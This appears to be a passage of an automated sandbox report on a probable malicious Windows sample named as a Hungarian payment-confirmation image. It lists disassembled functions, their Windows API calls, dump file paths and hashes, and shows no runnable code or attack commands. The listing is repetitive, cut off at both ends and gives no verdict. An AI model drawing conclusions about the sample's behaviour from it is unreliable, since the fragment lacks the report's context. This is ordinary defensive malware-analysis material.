                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: RectWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 861336768-0
                                                                                                          • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                          • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                          • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                          • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32 ref: 00449598
                                                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                          • String ID:
                                                                                                          • API String ID: 1856069659-0
                                                                                                          • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                          • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                          • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                          • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                          APIs
                                                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                          • TrackPopupMenuEx.USER32(02EE63D0,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1300944170-0
                                                                                                          • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                          • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                          • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                          • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                          APIs
                                                                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1822080540-0
                                                                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                          • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                          • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 659298297-0
                                                                                                          • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                          • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                          • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                          • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                          APIs
                                                                                                          • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                          • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                          • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                            • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(02EE1C40,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                            • Part of subcall function 00440D98: SendMessageW.USER32(02EE1C40,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$EnableMessageSend$LongShow
                                                                                                          • String ID:
                                                                                                          • API String ID: 142311417-0
                                                                                                          • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                          • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                          • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                          • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                          • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                          • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                          • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                          • _wcslen.LIBCMT ref: 004458FB
                                                                                                          • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3087257052-0
                                                                                                          • Opcode ID: 58b2d0fc0d887814ae1f78bb314e2e1363a4a0487ede693bc12998591e17cbfb
                                                                                                          • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                          • Opcode Fuzzy Hash: 58b2d0fc0d887814ae1f78bb314e2e1363a4a0487ede693bc12998591e17cbfb
                                                                                                          • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                          APIs
                                                                                                            • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                          • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                          • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                          • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 245547762-0
                                                                                                          • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                          • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                          • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                          • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                          APIs
                                                                                                          • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                          • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                          • BeginPath.GDI32(?), ref: 0044723D
                                                                                                          • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Object$Select$BeginCreateDeletePath
                                                                                                          • String ID:
                                                                                                          • API String ID: 2338827641-0
                                                                                                          • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                          • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                          • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                          • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                          APIs
                                                                                                          • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                          • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                          • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                                          • String ID:
                                                                                                          • API String ID: 2875609808-0
                                                                                                          • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                          • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                          • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                          • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                          APIs
                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                          • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                          • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                          • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3741023627-0
                                                                                                          • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                          • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                          • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                          • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                          • String ID:
                                                                                                          • API String ID: 4023252218-0
                                                                                                          • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                          • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                          • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                          • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2199540680.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2199523548.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199649001.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199672848.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199698741.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199722476.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2199769849.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1489400265-0
                                                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                          APIs
